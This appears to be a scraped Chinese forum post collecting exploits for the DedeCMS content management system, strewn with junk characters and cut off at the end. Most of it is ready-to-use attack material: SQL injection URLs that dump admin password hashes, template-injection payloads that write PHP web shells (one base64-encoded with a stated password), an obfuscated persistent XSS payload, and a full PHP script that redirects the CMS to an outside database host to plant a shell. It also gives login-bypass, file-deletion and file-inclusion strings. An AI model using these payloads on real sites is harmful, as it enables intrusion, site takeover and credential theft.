|
|
5 \1 b. b# r! V+ w- T+ m0 ~, d
Dedecms 5.6 rss注入漏洞
6 z. r6 M X3 z/ j$ lhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
5 K1 p1 F3 i" |- v; g# z
' K! U( L7 Q3 }) H7 @ u' ~7 n4 z& U1 e; ^5 L; V/ S# W1 o0 {
& B) a# S4 Z" c! R/ f( I
5 L) _" |# x) i% \9 O
& ? G5 `$ W0 O( J0 ^$ T
) j7 |4 B, r) m: v& D9 Q
( C; U! M' f8 r6 R1 r0 Q3 h: U1 [2 z9 ?, Q; ~+ x5 p2 [% s
DedeCms v5.6 嵌入恶意代码执行漏洞' a! M! `6 |) |) @
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57} k3 `; ]8 j# y! W' Y- l4 l
发表后查看或修改即可执行
( M2 y c5 x, I2 Aa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}$ z+ K* ^+ b9 w& S% W
生成x.php 密码xiao,直接生成一句话。7 B+ z' e/ T8 j4 _7 O* f4 Y
t2 t5 B. w% Q l7 `8 j$ R
& c( @! u# q$ U; L1 v- y
# r6 V# p/ w; w( |! r1 j0 c
8 P3 g7 _' e+ f4 x* L
& J0 r- F' o2 F; X
m4 B9 A. W" y1 M& G/ H W [- h# [) Q4 ]: [
( C& K# f! H0 x% ~5 \
Dede 5.6 GBK SQL注入漏洞& d1 [8 w8 @5 p3 s6 u
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';2 p2 d1 Z; W3 g. S' Z2 \& Y+ G- v
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
: v/ c( }5 T( xhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
: ]. Q. n0 n, U" }) g- a3 ^- X, T" S5 T
& b4 E$ I& d- H. z# C5 `4 u
3 P# d; H0 ], j4 c
5 R3 l# s2 R0 l, o+ N. t; S% a0 |( i1 j6 y9 I
6 S7 D+ Y$ o( ]& |0 ]/ p
, y. u* S) i" z' M6 A4 x, w2 \" R' @& P
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞! j- n2 B4 o1 E4 [" f% i$ g
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
7 b: y7 _- Q& n0 V% n* Z0 T
& O( e' e A+ `* G
7 r" U* }) H2 T9 c0 A- k
, N0 O' m* Q$ e2 X% N' r& w& X, D( e: w8 l/ {/ k. D6 @, ~9 V6 [
1 E3 `+ m0 W' J1 w
9 K( N+ Z/ c5 N& l% hDEDECMS 全版本 gotopage变量XSS漏洞
7 s$ W2 |* g `: C( Q1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 , N9 p) X% H8 Z" p' F" y
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="/ v+ V8 I7 n' R* L% S9 e
4 X$ d2 F. V. c+ W/ W
: z( u+ P% T7 r$ a2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
" F! t. i( \) p" ]http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda9 A3 [) x0 n9 r" P. X' |
% j R8 ~) D9 A8 d
: t e+ P& |5 Q( J( I$ b8 Uhttp://v57.demo.dedecms.com/dede/login.php1 b7 @3 S# O) i' p" l! C8 k
! T# {+ p# N/ V0 k: j8 _, u' U! g2 c
/ _. L) A, w9 O- z* Y7 }color=Red]DeDeCMS(织梦)变量覆盖getshell
: c6 h; X. o, v$ ?! z#!usr/bin/php -w
5 v2 I6 ]9 H! y) J<?php9 R: Q* m/ f% j% E2 A
error_reporting(E_ERROR);8 O$ U* ~! K) [, l
set_time_limit(0);
6 x- Q9 o0 d3 hprint_r('
& ^, g4 @3 i+ F, cDEDEcms Variable Coverage
& L4 t, ~8 a3 m$ E3 NExploit Author: www.heixiaozi.comwww.webvul.com y7 ?9 T9 J( V' S5 y
);9 X0 r$ k. z# ]3 x; {* n1 m
echo "\r\n";
- A! z! r u( n9 L* G+ M% Y, R/ n$ x" Wif($argv[2]==null){4 H7 _" B0 P9 @8 n0 c; ]# r
print_r('
2 s8 o. m8 W) H' P+---------------------------------------------------------------------------+
* Z' P7 T4 d* v9 o+ ]Usage: php '.$argv[0].' url aid path. Y, Z; n/ |0 l, m& C. a
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
6 I( S: ?5 q; w, p# I+ c: sExample:! l" R6 d7 n+ g
php '.$argv[0].' www.site.com 1 old5 i/ x" t( U G$ t
+---------------------------------------------------------------------------+
( H; r# g8 u3 V5 \) n5 u" \2 u6 o! ~7 h');
F$ P& q. I6 K2 i" ^! g' q3 Lexit;
" T G l" d. ^* i1 V* B) I}; d; X6 z0 m( @& ~0 V: l
$url=$argv[1];
$ [8 w/ H% c4 w$aid=$argv[2];
. X! Z8 t5 H4 U5 S! ]7 J# D8 F$path=$argv[3];
9 N: {( o$ a$ o i& v$exp=Getshell($url,$aid,$path);
' C. W8 ~/ P; lif (strpos($exp,"OK")>12){
% x/ P9 L! i. Zecho "
& L1 i8 ?( `) H) S/ |Exploit Success \n";
9 `' X' o& Y- m7 kif($aid==1)echo "
' j } W; A F5 V4 k% ]Shell:".$url."/$path/data/cache/fuck.php\n" ;
+ g9 |4 S1 v( R0 W( p
) I' q2 g8 A( \
8 ~- f5 @. f+ _$ C% cif($aid==2)echo "
3 ^( y0 d# h' R8 a% ]/ I" a( @Shell:".$url."/$path/fuck.php\n" ;5 ]1 {( i/ ] P
t( k7 O- r s5 D0 P
+ J0 f7 l6 z1 h% y- [! @if($aid==3)echo "
- F' `( g* @6 N) P+ }3 R, `* g% IShell:".$url."/$path/plus/fuck.php\n";+ v! P4 b) c. R
) d/ B; v) q$ o( O. ?* V1 r7 N
$ q O: z* k( c/ l. x6 n; s}else{7 U T2 E, M2 P1 \" Y) L
echo "- D4 r6 F0 ]4 G( N
Exploit Failed \n";3 i; z. v' m4 P
}
: ~, e4 W$ E7 C9 G! z" z3 G( [function Getshell($url,$aid,$path){
, j* L* }9 x9 ?( Y! g$id=$aid;
5 _' H* h& Q6 J$host=$url;4 R" C4 W7 O, |* z& `% v9 Y9 I
$port="80";- k0 ?' V) s# j; X" b% d) V& c0 g7 b
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
; B$ n0 Z- a/ w/ g; a$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
1 b, _8 a1 D* I, M$data .= "Host: ".$host."\r\n";
1 P( r. F7 U7 ~9 K( N# h. D) a S$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";$ K6 _8 Z0 n7 ~6 `
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";6 `! o3 M+ @6 v$ s3 G) O+ e7 v
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
m" [8 m4 J; _+ P# e: U. z//$data .= "Accept-Encoding: gzip,deflate\r\n";# f _; W; {; u, s) O. V( ^% Q3 G
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";. {3 C9 n8 a/ O6 G- m
$data .= "Connection: keep-alive\r\n";
$ |7 Y# f i, P+ Y6 \) B& e$data .= "Content-Type: application/x-www-form-urlencoded\r\n";% `- ?! ~; l7 x l" K, {' V% r. s
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
2 k- Q+ F8 P$ \* C9 g$data .= $content."\r\n";
9 ]& m; y: W% S; l: E$ock=fsockopen($host,$port);
! q; a0 h7 b! ~ b) dif (!$ock) {
3 J( o: v3 Y; n$ z: aecho "7 x$ a8 x) [: L) i0 @' p- t0 O
No response from ".$host."\n";
: [) m5 |3 ?5 h+ ~* V8 e# c6 F+ i}
6 h3 A& c* s! D. J# n+ Efwrite($ock,$data);
4 y1 O. T) j" p3 n3 Awhile (!feof($ock)) {
7 B# y, Q# p% k( }; P7 @7 G$exp=fgets($ock, 1024);
( ]0 X' K, T2 R% k) A8 d( Dreturn $exp;
- s3 k8 F) b! j+ x: z/ \- ?}2 M- E5 s1 A& y% V: {
}' v7 \) t) a4 V+ \
$ E2 _7 {8 W% |. d0 S6 d$ q' U% r2 \) d2 \2 E
?>. a9 K: k. D" r- [! J: N2 y( x
+ @- _! N m) }& A" r4 i
/ s+ Z, w3 |5 K- w
* e0 A* b4 {3 G/ J3 e) q* _, a7 ?/ X" L
) }0 z% \+ ^! p0 b5 ~" C* A4 l- o" |- i8 ^
# V, n5 _% r& {% C" a; [( p. x
9 x! y+ z q: s y* L) \/ @( w' V
* f$ G$ Z) q# I* o. {( b( @& M1 q# S' s, x
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)7 g& z7 u+ F0 U# D1 Z
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
0 v% }# B7 C- a8 T0 @. o; b( h0 O
. u- M) V$ B9 H把上面validate=dcug改为当前的验证码,即可直接进入网站后台
7 k! Q5 i# g9 u+ _, l) b4 k. w" S
2 k/ B# D. [3 X) x& W
! o+ k4 u. o# Z2 N- d4 B& Q此漏洞的前提是必须得到后台路径才能实现
' A3 t3 K7 A% [& A1 N# V, J0 a
( X1 Y- q" X) X7 T n* G# t
, w( V0 H* D1 o4 T/ @
8 \: p- D6 y1 S B. t) b* _" \
8 v# S3 ~: H8 A7 _4 D- c/ s
# _" [7 p2 e$ [5 `, f
! v+ }1 m! p6 _. V5 _: K' v" i2 t; q4 z3 |
' d0 P! ~8 X/ l* Y% U' }# d& t5 ^ v, s+ V. [1 ~( I7 [
& `) V8 C% d- s' b
Dedecms织梦 标签远程文件写入漏洞- R- z5 [* C6 w( {4 Q6 ~
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');% ^3 i. z- ~/ D, g9 C+ P; x
. o" ~) j( ?. i, ^' F' \
8 f$ x' [* K5 l/ }5 m4 t e( z再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 # R( C! u& k4 P/ X; B( Q
<form action="" method="post" name="QuickSearch" id="QuickSearch">, Q/ w8 C( {/ }( K
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />5 g; T" T/ |. m7 @/ ?
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
k5 j6 ^ x/ t<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />: d. t( K$ B4 x
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
5 B0 v) ?) r N. R# v4 o9 f, Y3 v' t<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
- s V5 ?" B2 d8 P6 U9 K5 |7 B- E<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />/ @ @' V# p& O" V9 n2 ~$ r
<input type="text" value="true" name="nocache" style="width:400">
& z! X, U: S8 x, E+ s+ Q! _<input type="submit" value="提交" name="QuickSearchBtn"><br />" l/ N: |3 V1 V- c5 l, `! d0 _
</form>- G f3 c: F' o+ v! T8 [3 U
<script>8 \8 B: n0 n/ c* v. K* h c
function addaction()6 w( X' T# X* P1 m
{
9 Q0 c; ~% T& y7 y+ N. T; M8 Mdocument.QuickSearch.action=document.QuickSearch.doaction.value; U, G# Q1 L4 }; p# V0 w7 |4 \
}/ l0 B J0 y4 m. v2 W2 c! N
</script>8 U% Z0 `5 Z% a6 q. O
x0 ?8 o: o, b. O$ l4 A( Z- p5 S6 r+ w% Q/ x- G3 M7 j& [
5 r4 x) y* F$ B! P8 I
+ {1 t. T9 ~& Z- b8 g- Q: x4 g ?+ F1 {- B) N' K
) q8 V; U* J3 z$ _2 w9 h3 Q# t( z
1 ]0 v) s$ u' q) [( A# m) Z
5 Q% w" v5 `$ \6 t. G/ `) J9 D
7 @% ]& R. S1 B; Q' v/ |' V! U, j+ F* U+ {" d! Y
DedeCms v5.6 嵌入恶意代码执行漏洞0 V I, b! `; e2 n( L
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
! K, W* Q7 r) x& v% V$ }6 o; P: za{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
8 X( O: {% }4 T4 y$ o2 @生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得7 l d2 V4 f" ~# W: Q0 a7 h% h
Dedecms <= V5.6 Final模板执行漏洞8 s6 G- ^; y1 ?1 p
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
; J: y* x& O8 M+ j- H4 kuploads/userup/2/12OMX04-15A.jpg
4 ?0 m! N- p" P& \0 I
) a2 z+ J" O% z! D9 s" x
2 G9 P Y3 z+ v# i# ]模板内容是(如果限制图片格式,加gif89a):7 C+ a& [' b5 i' c2 g7 u! m3 o
{dede:name runphp='yes'}/ D6 N: Q$ c. d1 B* y
$fp = @fopen("1.php", 'a');
1 Y. r2 ?1 X0 |1 _4 R@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
+ j3 g1 g- Q4 c@fclose($fp);
" I% Z. n" u9 f( K. R) @5 u{/dede:name}" U; }/ U+ p. N: _
2 修改刚刚发表的文章,查看源文件,构造一个表单:
6 y* B4 Y3 b! Y9 E# z: T<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
2 \& ]$ H7 c {<input type="hidden" name="dopost" value="save" />7 w4 A/ c* {* N4 H- _6 c, I
<input type="hidden" name="aid" value="2" />
$ z; |; B) V* V<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />1 ~3 E6 P. q8 R* V7 ~9 ^$ N
<input type="hidden" name="channelid" value="1" />4 }5 ^- x/ R. k& ]( l# X! W, C5 O0 E
<input type="hidden" name="oldlitpic" value="" />% s8 s* f l& k" B; ^
<input type="hidden" name="sortrank" value="1275972263" />
7 A g* {! q* h
: a" t2 ^# s* V3 U0 [; ]4 ?7 Z% A
& V7 |- V3 b$ [3 v: y$ U<div id="mainCp"> P! Q2 g% q& Y( J
<h3 class="meTitle"><strong>修改文章</strong></h3>4 C. _# y1 O2 b y; _. ?
% |( T, Q/ W9 j* ]) ]" \
$ D7 K. g. W; A% F, G4 e4 @$ ^
<div class="postForm">
+ E A0 [7 i. T, w<label>标题:</label>
5 D( `( a/ e& K, ]% M, n<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>3 W/ z! E" P' r" B
; x7 v3 |3 z) [5 [9 R, O W+ M
* d; G8 _2 I: `# H6 K6 s* B<label>标签TAG:</label>
8 t" M) {. F* o7 d$ E0 R; ?<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
9 n0 s: s% z1 F$ A# f! U- |
/ ?2 C5 E5 \/ f% A
1 `8 d9 T( Q5 \0 T$ N+ @8 x: N9 Y<label>作者:</label>
1 {: c4 _; N3 O- _' S$ [6 b<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
* N2 f; K+ \% q/ A& x9 p- {: e
2 X& h6 q# H( \" a* k9 T4 d! h4 K, [$ R9 L6 M. q. I6 B
<label>隶属栏目:</label>
- | A% W( m4 x3 X& t5 T( [<select name='typeid' size='1'>- {8 e7 k. l+ b1 p5 p' d6 N
<option value='1' class='option3' selected=''>测试栏目</option>
) c1 A8 t! G) S) f6 x</select> <span style="color:#F00">*</span>(不能选择带颜色的分类), x5 Y6 e0 w" D1 K
, p2 V% ?! `9 t* [, q9 t
3 k9 T: C/ o e6 @' s
<label>我的分类:</label>
' u# A& M# y$ `; F<select name='mtypesid' size='1'>
' V5 m5 |3 \- R6 p, N<option value='0' selected>请选择分类...</option>
! `- k/ e% v. H& T" t" z<option value='1' class='option3' selected>hahahha</option>
$ z9 p) g% w3 O</select>
9 h4 E2 g) x: P0 |4 b) K) G3 A
& [% ^0 _# [! C! u1 }: f( b' B
1 N! w$ T# x) \6 X( A3 ~4 f<label>信息摘要:</label>
/ B4 x7 i. h) P( a<textarea name="description" id="description">1111111</textarea>
2 r: a- e. S4 U9 X- l9 M7 M(内容的简要说明)
3 q G1 ~% d A3 l: u( p" M* R' ?: l9 E3 h7 `
4 U; w) G( v2 w# E; h. ]+ v' c+ |
<label>缩略图:</label>3 |9 g: Z$ k1 n% F2 [/ ^
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
4 B, ~3 F9 H) U% |% D! K
9 {) a* m2 D8 G$ l. [6 z8 o1 y8 @% O9 A @( v0 E
<input type='text' name='templet'
, S0 v% J0 U9 @7 g, ~4 d) ivalue="../ uploads/userup/2/12OMX04-15A.jpg">
& }6 x. g) F [8 |<input type='text' name='dede_addonfields'4 m7 K+ ]" W, r" |# T
value="templet,htmltext;">(这里构造)1 o5 ]/ r& `; a9 b9 r- Y8 K
</div>
8 u8 p, [5 q( W& t7 s }2 i0 v8 E# R! b8 y5 G( ~( r; ?% r
0 A) b: J- G* }5 J, h+ d<!-- 表单操作区域 -->
3 ^; s+ f1 \% `3 x<h3 class="meTitle">详细内容</h3>5 g6 d t% R- k8 z; S2 j% K
2 H! l6 _/ S$ X A1 K( b
% `7 |0 [) I/ P& i
<div class="contentShow postForm">+ h. E6 Z4 o% ^( z' X" ~
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>3 p6 |# M8 h3 O% ~2 I7 [, V3 r
0 o9 B) M9 M# p# K
5 J: m, Q: Y0 F<label>验证码:</label>
' p& D; S/ ~4 T8 H7 U<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
. L! z E% s2 b<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
6 f; B) Z1 ^' L
- ^# v0 I7 b0 {8 L$ E* S/ U( p/ W( l8 ^ v
<button class="button2" type="submit">提交</button>
6 N9 ?# Y- `2 P, J1 R) P<button class="button2 ml10" type="reset">重置</button>
* a0 e, w) M. Q; u P4 V</div>+ S- v$ @2 d5 Y9 m) O
. a% L% W) [5 a, n
( E. Z h e2 m U- ~</div>
7 `6 C, [' k3 }, o/ u. ^
2 ?( m; s/ h( r) D$ D4 \# T' \; k+ Y/ i4 |
</form>+ ]2 p+ z% U3 [* Y3 t
# M2 u- C: h$ W0 Q4 G; L9 q
- n/ P# O) }! Y提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
2 _6 X" G% U7 ?7 v+ X( f: {假设刚刚修改的文章的aid为2,则我们只需要访问:
; R1 ]7 ?' O/ k5 p+ T0 s$ ]7 n/ thttp://127.0.0.1/dede/plus/view.php?aid=2' Z8 w. K: W$ F+ \' q
即可以在plus目录下生成webshell:1.php. V% y# c! L. c1 I: B
2 d& B4 D7 T* m- Y
' q% M% E" t/ V4 L5 `# U3 }
9 {% L! m$ L8 j$ M1 z7 O( d! x, O/ o9 Z9 V: j$ C6 f3 U
( I) z' ~& }& J3 _% W0 d `3 a% f( P$ Y
9 v9 o" |5 r H% p
[ k1 d Y+ c2 E7 _
0 v/ \- O, D, Z9 p7 Q
. ]) M- D$ ?& v! t9 R
! f- v' \" J9 ~: Q% p) s9 u4 `4 ?- i% R" Z1 e! l5 d0 a8 k& Z8 ^1 |
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
* w# d0 |3 Z* [# Q: x' e& O& ~; t% GGif89a{dede:field name='toby57' runphp='yes'}+ Y0 w6 `% h9 ?
phpinfo();
4 c& }3 k( \; ?! y# y) U% Y; ^{/dede:field}& e* z. g1 ]6 Q
保存为1.gif5 T7 P$ l! Z- r7 k1 U
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
/ I5 D9 _7 `7 o<input type="hidden" name="aid" value="7" />
% ? q- a3 n: p6 g8 L: w<input type="hidden" name="mediatype" value="1" />
- u( Y4 q4 v% g; g# ]/ l5 F8 j<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> R: M. X5 g, a
<input type="hidden" name="dopost" value="save" />
% ], z" F% b2 M4 a% ]' T7 q! o<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 8 d! `! U1 V! j( I$ n; T' W
<input name="addonfile" type="file" id="addonfile"/>
' w' ~, o* i$ r" k6 A<button class="button2" type="submit" >更改</button>
( `$ C3 ]! g) o$ n: T</form>
& \9 E: F k6 S* _) t8 e! p% U8 u1 ?: X% y. K# a7 f& x
6 c4 y- W8 T) W) z构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
3 J& Y: X0 N _! o3 p. j) q& ~发表文章,然后构造修改表单如下:) W. I* `$ P- `, b* g. I* G. R1 c
+ n" g) @/ b, q' Z
+ u, C6 j* a# t% {, Z" G8 T$ u<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> " x6 n/ ]+ ^( N8 ^1 u% U
<input type="hidden" name="dopost" value="save" /> . w% S8 Z! ^% f9 S }$ `
<input type="hidden" name="aid" value="2" /> 6 q0 e3 B: z3 J2 `# C
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
0 Q; T/ d8 {' T! c<input type="hidden" name="channelid" value="1" />
, W4 P! g" N% \6 z9 N<input type="hidden" name="oldlitpic" value="" />
& F! u& l" e E. |<input type="hidden" name="sortrank" value="1282049150" /> 9 U1 S, J8 E1 @$ Y* ^ E
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
L8 Z/ w A; I- f$ F4 A<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> + h1 y2 ^0 h# p2 ]
<select name='typeid' size='1'> - { ^6 B, B% m% o
<option value='1' class='option3' selected=''>Test</option>
n/ D" t; ]. Y) w* {% l<select name='mtypesid' size='1'>
/ M5 n2 r2 J9 Y+ V9 l9 d; ?3 b, l<option value='0' selected>请选择分类...</option>
3 ] ]# p! D' ?% U<option value='1' class='option3' selected>aa</option></select>
# t p/ Q4 e( `; L! Y4 C; a. Y<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> : ?, x C4 G9 z( I: E
<input type='hidden' name='dede_addonfields' value="templet"> / Q2 w- q' R' ^5 r! W9 l
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> $ V, C* E4 `$ V; m
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
! o6 g# i* p$ a<button class="button2" type="submit">提交</button>
6 |8 }& N% L& ^/ u/ F* j b</form>
6 S3 t9 j3 I A' u5 D1 m5 Q1 |! ^4 M+ [
$ c, _3 Z9 y- Y$ y
$ L. [% r" {! r* f
2 `; g3 j: }# t" Z, i$ z
6 M C& E3 |& n; B
2 P+ M( ?. [& x) d7 G8 ?0 U* F$ D9 L) p2 T+ ^
/ M6 t4 V( Z7 o9 F/ ]' j& L7 Q8 G
; e" u0 `, W: J9 L5 ]: D
, i4 {, T2 r2 c! C5 n5 j% s
0 e w }2 Q. Y2 f# h; v0 \) k; i- W4 M6 K9 N# v
织梦(Dedecms)V5.6 远程文件删除漏洞
+ r2 W( t) E n: B( {http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif# I+ x& g! D4 ], M& i f1 _/ w1 m- M
. }" R. W! t5 {0 y+ B! C. a$ \9 n; J1 c4 _6 e, }
/ m% n: a J* A0 [* D7 t9 Q3 K/ Z! ^# o0 B8 S" }
- ]& z% B1 A: d4 v5 \0 \ d, B C5 H$ \# i) D
/ k2 B) K6 w) E3 G( Q
6 \7 i( f4 q/ s( L3 [9 S$ I7 Z( A! D, U: g9 {$ S, ]% j" Y- a+ G8 o
: w0 c1 P v' Q- g织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
3 M: e+ i+ A5 Thttp://www.test.com/plus/carbuya ... urn&code=../../8 T5 ^! ~" j# A4 t4 C
6 X$ i0 M# b5 r: Y8 V% t7 a
4 I/ c1 ]5 Q$ |/ n" Z0 K! F; i# O W
7 c* |$ ]6 P& I4 ?; B5 D
6 q, W2 J. X7 ]* J7 N6 u0 ~
# A l; z+ C9 B5 a" O1 g5 T6 l. A2 x
8 ^* A) B' G7 M$ @! s
. O+ Y+ w# C. U
' P, x( |: b& H1 g- X$ }2 Q
6 F3 J2 u4 ~4 S. P7 K/ C, w- V& _( ^5 D8 N2 y& m B
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 & U3 N9 U( {& H+ @# L& r; H' x2 B
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`5 N; i( F3 B; X# `, O
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
: p& Z- i+ d }
* L! v# }. e6 V6 {8 S1 U; E1 [- s- I6 l4 N! S
0 N/ y2 g( f( Z) h; j H2 _
. O5 C/ S6 k: V+ I
# d7 V6 d6 |1 Y1 X& K% J* [' h8 }/ w
4 L; S& ^8 f. ?
9 \$ u Q7 Z0 }. |) p) T
: r+ m2 l: ~) v. L
1 T# H1 _1 z5 V0 _+ z织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
. K9 M: u [ K, K) r" ?http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
! C4 K2 Q% Q! [: e( y, n
/ a" f$ v, ?" S3 [+ T3 |/ g$ h, [: c# a- y: m$ \
; C: [& t# F" m+ {
% F% G/ a. }% j/ g0 x5 S0 |4 ^% N1 h0 s) w' C
( P) W8 P; ]! x
' L p; `' c* Y2 N
! }$ Y$ Q0 F& \: q8 [+ n2 a3 C* e( v3 S d% i0 `$ ^! Y
]) y5 N( c/ D* p
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
" e! F3 t( G: N; R<html>: c; ]# p8 V; |. `
<head>
